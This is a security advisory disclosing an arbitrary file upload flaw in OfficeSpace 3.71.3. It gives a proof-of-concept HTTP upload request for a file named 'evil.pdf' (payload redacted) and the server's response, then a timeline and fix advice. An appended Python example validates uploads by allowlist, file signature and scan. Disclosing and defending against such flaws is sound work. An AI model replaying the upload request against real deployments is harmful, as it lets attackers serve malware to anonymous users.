#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: OfficeSpace [1]
# Vendor:  OfficeSpace Software Inc.
# CSNC ID: CSNC-2018-018
# Subject: Arbitrary File Upload
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Stephan Sekula
# Date:    18.04.2018
#
#############################################################

Introduction:
-------------
The smarter, easier way to manage your space. [1]

Compass Security discovered a security flaw in OfficeSpace, which allows
users to spread malware to anonymous users.

Affected:
---------
Vulnerable:
 * Version 3.71.3

Technical Description
---------------------
Users are able to upload arbitrary files to the system. Uploaded files are
neither checked for their file type nor for malware. Further, files can be
accessed by anonymous users, which increases the risk of this vulnerability.

Request (uploading a pdf containing malware):

POST /request-manager/attachments HTTP/1.1
Host: [CUT]
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: [CUT]
X-Requested-With: XMLHttpRequest
Content-Length: 46454
Content-Type: multipart/form-data; boundary=[CUT]
Cookie: showBrowserWarning=true; _huddle_session=[CUT]
Connection: close

-----------------------------[CUT]
Content-Disposition: form-data; name="request_attachment[attachment]"; filename="evil.pdf"
Content-Type: application/pdf

%PDF-1.0
[CUT]
endstream
endobj
9 0 obj
<>
endobj
10 0 obj
[CUT]

Response:

HTTP/1.1 200 OK
Date: Wed, 18 Apr 2018 05:36:47 GMT
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: application/json; charset=utf-8
Cache-Control: max-age=0, private, must-revalidate
Strict-Transport-Security: max-age=15552000; includeSubDomains
Set-Cookie: _huddle_session=[CUT]; path=/; secure; HttpOnly
Vary: Accept-Encoding
Content-Length: 265
Connection: close

{"id":15,"request_id":null,"attachment_file_name":"evil.pdf",
"attachment_content_type":"application/pdf","attachment_file_size":46209,
"attachment_updated_at":"[CUT]",
"created_at":"[CUT]","updated_at":"[CUT]"}

Workaround / Fix:
-----------------
This issue can be fixed by properly checking uploaded files for their
contents and for malware.

Timeline:
---------
2018-07-31: Public disclosure date
2018-05-02: Initial vendor response
2018-04-23: Initial vendor notification
2018-04-18: Discovery by Stephan Sekula

References:
-----------
[1] https://www.officespacesoftware.com
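
Added example (not part of the original advisory and not OfficeSpace code): one way to implement the server-side check described under "Workaround / Fix", combining an extension allowlist, a content-signature check and a malware-scan hook. The allowlist, size limit, verdict names and the scanner callable are assumptions chosen for illustration.

```python
"""Server-side upload check: allowlist + content signature + malware-scan hook.
Added example; names and policy below are assumptions, not OfficeSpace code."""
import os

# Allowlist (assumed policy): extension -> (expected MIME type, leading magic bytes)
ALLOWED = {
    ".pdf": ("application/pdf", b"%PDF-"),
    ".png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    ".jpg": ("image/jpeg", b"\xff\xd8\xff"),
}
# PDF name tokens that indicate active content; such files are held for review.
PDF_ACTIVE = (b"/JavaScript", b"/JS", b"/OpenAction", b"/Launch", b"/EmbeddedFile")
MAX_SIZE = 10 * 1024 * 1024  # assumed size limit


def check_upload(filename, declared_type, data, scanner=None):
    """Return (verdict, reason); verdict is 'accept', 'quarantine' or 'reject'.

    scanner is a hypothetical callable(data) -> bool (True = malware found),
    standing in for whatever AV engine the deployment uses.
    """
    name = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED:
        return "reject", "extension not allowlisted"
    mime, magic = ALLOWED[ext]
    if declared_type != mime:
        return "reject", "declared Content-Type does not match extension"
    if len(data) > MAX_SIZE:
        return "reject", "file too large"
    if not data.startswith(magic):
        return "reject", "content does not match declared type"
    if scanner is None:
        return "quarantine", "no malware scan performed"  # fail closed
    if scanner(data):
        return "reject", "malware scanner flagged file"
    if ext == ".pdf" and any(tok in data for tok in PDF_ACTIVE):
        return "quarantine", "PDF carries active content"
    return "accept", "ok"


if __name__ == "__main__":
    # Constructed samples, not taken from the advisory.
    clean = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
    active = b"%PDF-1.4\n1 0 obj\n<< /OpenAction 2 0 R >>\nendobj\n"
    no_hit = lambda data: False
    print(check_upload("report.pdf", "application/pdf", clean, no_hit))
    print(check_upload("evil.pdf", "application/pdf", active, no_hit))
    print(check_upload("evil.pdf", "application/pdf", b"MZ\x90\x00", no_hit))
```

Only files with an "accept" verdict should become downloadable; the check does not replace requiring authentication for attachment access.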